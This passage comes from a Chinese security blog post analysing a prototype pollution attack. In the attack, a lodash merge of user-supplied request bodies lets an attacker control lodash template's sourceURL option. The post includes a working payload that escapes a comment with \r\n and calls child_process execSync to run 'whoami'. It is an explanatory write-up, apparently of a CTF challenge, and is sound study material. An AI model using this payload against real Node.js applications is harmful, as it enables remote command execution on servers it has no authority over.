</span><br><span class="line"></span><br><span class="line">res.render(<span class="string">'index'</span>, &#123;</span><br><span class="line">    language: data.language, </span><br><span class="line">    category: data.category</span><br><span class="line">&#125;)</span><br><span class="line"></span><br><span class="line">&#125;)</span><br></pre></td></tr></table></figure>

<p>在上面也说过原型链污染一般会出现在merge和clone中，那么这里的merge正好可以去触发原型链污染，而且req.body还是我们自行控制的，那么就可以造成原型链污染了</p>
<h5 id="漏洞点触发"><a href="#漏洞点触发" class="headerlink" title="漏洞点触发"></a>漏洞点触发</h5><p>这个漏洞触发倒是很仔细的分析了一波，分析了一下，也发现了一些很有意思的点。这里详细的记录分析一哈</p>
<p>正常的访问流程依然没变，先是把body中的数据传递到session中的data，然后渲染index页面，那么原型链污染的点是在data，我们下面就来仔细分析一下index的漏洞触发问题，首先跟进template函数，这个函数就是触发的关键了，因为后面的句子就是动态引入变量了，我们在template函数中需要找到一个未经过定义的变量这样才能通过这个变量拿到污染的值，这个变量就是sourceURL</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> sourceURL = <span class="string">'//# sourceURL='</span> +</span><br><span class="line">  (<span class="string">'sourceURL'</span> <span class="keyword">in</span> options</span><br><span class="line">    ? options.sourceURL</span><br><span class="line">    : (<span class="string">'lodash.templateSources['</span> + (++templateCounter) + <span class="string">']'</span>)</span><br><span class="line">  ) + <span class="string">'\n'</span>;</span><br></pre></td></tr></table></figure>

<p>在正常传递payload的情况下我们可以去看一些sourceURL的值</p>
<p><img src="https://s2.ax1x.com/2019/09/18/nHXw0s.png" alt="nHXw0s.png"></p>
<p>这就说明了options.sourceURL的值是未定义的，这就符合我们所需要的未定义的变量了，那么sourceURL在原型链污染的情况下最终的值就是我们的污染语句了，那么下面就接着跟一下这个template吧，最后template函数返回的变量是result，那么我们来看一下result的定义</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> result = attempt(<span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">Function</span>(importsKeys, sourceURL + <span class="string">'return '</span> + source)</span><br><span class="line">    .apply(<span class="literal">undefined</span>, importsValues);</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>

<p>通过Function匿名函数，importsValues以数组形式代表参数</p>
<p><img src="https://s2.ax1x.com/2019/09/18/nbS1Rx.png" alt="nbS1Rx.png"></p>
<p>那么在原型链污染的情况下我们就可以控制sourceURL,提前return我们想要的污染语句</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">\r\nreturn e &#x3D; () &#x3D;&gt; &#123;return global.process.mainModule.constructor._load(&#39;child_process&#39;).execSync(&#39;whoami&#39;).toString()&#125;\r\n</span><br></pre></td></tr></table></figure>

<p>这里通过\r\n来逃避之前的注释，至于这里为什么要return一个匿名函数，之后会有一个解释，那么就继续跟进，将result返回给我们的compiled，再通过这个compiled去动态引入一些配置变量</p>
<p>不过这里有一个很有意思的地方，污染情况下和没污染的compiled的值对比如下</p>
<p>污染后</p>
<p><a href="https://imgchr.com/i/nbpfBD" target="_blank" rel="noopener"><img src="https://s2.ax1x.com/2019/09/18/nbpfBD.png" alt="nbpfBD.png"></a></p>
<p>污染前</p>
<p><img src="https://s2.ax1x.com/2019/09/18/nbpbgP.png" alt="nbpbgP.png"></p>
<p>从这两处对比来看其实我们可以发现命令执行应该是在</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">let rendered &#x3D; compied(&#123;...options&#125;)</span><br></pre></td></tr></table></figure>

<p>这里进行执行的，而且compiled在两处分别是对象函数与匿名函数，这里我有一个推测，就是必须要通过函数的形式来引入这些配置变量，这也就是为什么我们污染语句不是函数的话他就会报错的原因了，这里匿名函数执行到导致后面的源码无法渲染回来，所以我们原型链污染后他返回来的代码是我们命令执行的结果，并且没有一点之前的源码，最终得到 了我们的结果</p>
<p>PS：如果不是单独docker靶机的话，最好加个循环把污染的环境变量删掉，防止你的flag泄露</p>
<p>最后效果</p>
<p><a href="https://imgchr.com/i/nb9BKf" target="_blank" rel="noopener"><img src="https://s2.ax1x.com/2019/09/18/nb9BKf.png" alt="nb9BKf.png"></a></p>
<h3 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h3><p><a href="https://juejin.im/post/5b3798f851882574c105c51c" target="_blank" rel="noopener">https://juejin.im/post/5b3798f851882574c105c51c</a></p>
<p><a href="https://juejin.im/post/5b3dd222e51d4519226f204d" target="_blank" rel="noopener">https://juejin.im/post/5b3dd222e51d4519226f204d</a></p>
<p><a href="https://juejin.im/post/5cc99fdfe51d453b440236c3" target="_blank" rel="noopener">https://juejin.im/post/5cc99fdfe51d453b440236c3</a></p>
<p><a href="https://www.leavesongs.com/PENETRATION/javascript-prototype-pollution-attack.html" target="_blank" rel="noopener">https://www.leavesongs.com/PENETRATION/javascript-prototype-pollution-attack.html</a></p>
<p><a href="https://paper.seebug.org/755/#hard-thejs" target="_blank" rel="noopener">https://paper.seebug.org/755/#hard-thejs</a></p>
<p><a href="https://blog.csdn.net/cc18868876837/article/details/81211729" target="_blank" rel="noopener">https://blog.csdn.net/cc18868876837/article/details/81211729</a></p>
<p><a href="https://blog.csdn.net/ylwdi/article/details/82805255" target="_blank" rel="noopener">https://blog.csdn.net/ylwdi/article/details/82805255</a></p>

      
    </div>
    <footer class="article-footer">
      
        <a data-url="http://yoursite.com/2019/09/25/Prototype-Pollution-Attack/" data-id="ckck0ice0000i04wbeumlayux" class="article-share-link" data-share="baidu" data-title="Prototype Pollution Attack">Share</a>
      

      

      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Web%E5%AE%89%E5%85%A8/" rel="tag">Web安全</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2020/02/14/%E4%BB%8E%E6%B5%8F%E8%A7%88%E5%99%A8%E6%B8%B2%E6%9F%93%E4%B8%8E%E8%A7%A3%E7%A0%81%E5%8E%9F%E7%90%86%E9%87%8D%E6%96%B0%E8%AE%A4%E8%AF%86xss/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          从浏览器渲染与解码原理重新认识xss
        
      </div>
    </a>
  
  
    <a href="/2019/07/20/JSONP%E5%8A%AB%E6%8C%81/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">JSONP劫持</div>
    </a>
  
</nav>

  
</article>

</section>
      
      <aside id="sidebar">
  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/DOM-Clobbering-Attack/" rel="tag">DOM Clobbering Attack</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/JSONP/" rel="tag">JSONP</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Javascript/" rel="tag">Javascript</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/PHP%E6%AD%A3%E5%88%99%E5%AE%89%E5%85%A8%E7%A0%94%E7%A9%B6/" rel="tag">PHP正则安全研究</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Swoole/" rel="tag">Swoole</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Variable-hijacking/" rel="tag">Variable hijacking</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Web%E5%AE%89%E5%85%A8/" rel="tag">Web安全</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/XSS/" rel="tag">XSS</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/fastjson/" rel="tag">fastjson</a><span class="tag-list-count">2</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/intigriti-Easter/" rel="tag">intigriti Easter</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/java/" rel="tag">java</a><span class="tag-list-count">2</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%89%8D%E7%AB%AF%E5%AE%89%E5%85%A8/" rel="tag">前端安全</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%B5%8F%E8%A7%88%E5%99%A8%E6%B8%B2%E6%9F%93/" rel="tag">浏览器渲染</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E8%B7%A8%E5%9F%9F/" rel="tag">跨域</a><span class="tag-list-count">1</span></li></ul>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/DOM-Clobbering-Attack/" style="font-size: 10px;">DOM Clobbering Attack</a> <a href="/tags/JSONP/" style="font-size: 10px;">JSONP</a> <a href="/tags/Javascript/" style="font-size: 10px;">Javascript</a> <a href="/tags/PHP%E6%AD%A3%E5%88%99%E5%AE%89%E5%85%A8%E7%A0%94%E7%A9%B6/" style="font-size: 10px;">PHP正则安全研究</a> <a href="/tags/Swoole/" style="font-size: 10px;">Swoole</a> <a href="/tags/Variable-hijacking/" style="font-size: 10px;">Variable hijacking</a> <a href="/tags/Web%E5%AE%89%E5%85%A8/" style="font-size: 10px;">Web安全</a> <a href="/tags/XSS/" style="font-size: 10px;">XSS</a> <a href="/tags/fastjson/" style="font-size: 20px;">fastjson</a> <a href="/tags/intigriti-Easter/" style="font-size: 10px;">intigriti Easter</a> <a href="/tags/java/" style="font-size: 20px;">java</a> <a href="/tags/%E5%89%8D%E7%AB%AF%E5%AE%89%E5%85%A8/" style="font-size: 10px;">前端安全</a> <a href="/tags/%E6%B5%8F%E8%A7%88%E5%99%A8%E6%B8%B2%E6%9F%93/" style="font-size: 10px;">浏览器渲染</a> <a href="/tags/%E8%B7%A8%E5%9F%9F/" style="font-size: 10px;">跨域</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/09/">September 2020</a><span class="archive-list-count">3</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/08/">August 2020</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/05/">May 2020</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/04/">April 2020</a><span class="archive-list-count">3</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/03/">March 2020</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/02/">February 2020</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/09/">September 2019</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/07/">July 2019</a><span class="archive-list-count">1</span></li></ul>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2020/09/29/Fastjson%E5%88%86%E6%9E%90%E7%B3%BB%E5%88%97-%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%8F%8A%E6%80%BB%E7%BB%93/">Fastjson分析系列--历史漏洞分析及总结</a>
          </li>
        
          <li>
            <a href="/2020/09/24/Fastjson%E5%88%86%E6%9E%90%E7%B3%BB%E5%88%97--1-2-22-1-2-24%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-1/">Fastjson分析系列--1.2.22-1.2.24反序列化漏洞分析</a>
          </li>
        
          <li>
            <a href="/2020/09/09/Swoole-deserialization-Gadgets/">Swoole deserialization Gadgets</a>
          </li>
        
          <li>
            <a href="/2020/08/09/ysoserial-%E8%B0%83%E8%AF%95%E5%88%86%E6%9E%90/">ysoserial-调试分析</a>
          </li>
        
          <li>
            <a href="/2020/05/12/intigriti-Easter-XSS-challenge/">intigriti Easter XSS challenge</a>
          </li>
        
      </ul>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Links</h3>
    <div class="widget">
      <ul>
        
      </ul>
    </div>
  </div>

  
</aside>
      
    </div>
    <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2020 离怀秋<br>
      Powered by <a href="//hexo.io/" target="_blank">Hexo</a>
      .
      Theme by <a href="https://github.com/xiangming/landscape-plus" target="_blank">Landscape-plus</a>
    </div>
  </div>
</footer>
  </div>
  <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
    <a href="/about" class="mobile-nav-link">About</a>
  
</nav>
  <!-- totop start -->
<div id="totop">
<a title="totop"><img src="/img/scrollup.png"/></a>
</div>

<!-- totop end -->


<!-- 百度分享 start -->

<div id="article-share-box" class="article-share-box">
  <div id="bdshare" class="bdsharebuttonbox article-share-links">
    <a class="article-share-weibo" data-cmd="tsina" title="分享到新浪微博"></a>
    <a class="article-share-weixin" data-cmd="weixin" title="分享到微信"></a>
    <a class="article-share-qq" data-cmd="sqq" title="分享到QQ"></a>
    <a class="article-share-renren" data-cmd="renren" title="分享到人人网"></a>
    <a class="article-share-more" data-cmd="more" title="更多"></a>
  </div>
</div>
<script>
  function SetShareData(cmd, config) {
    if (shareDataTitle && shareDataUrl) {
      config.bdText = shareDataTitle;
      config.bdUrl = shareDataUrl;
    }
    return config;
  }
  window._bd_share_config={
    "common":{onBeforeClick: SetShareData},
    "share":{"bdCustomStyle":"/css/bdshare.css"}
  };
  with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='//bdimg.share.baidu.com/static/api/js/share.js?cdnversion='+~(-new Date()/36e5)];
</script>

<!-- 百度分享 end -->

<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>





<script src="/js/script.js"></script>


</div>
</body>
</html>
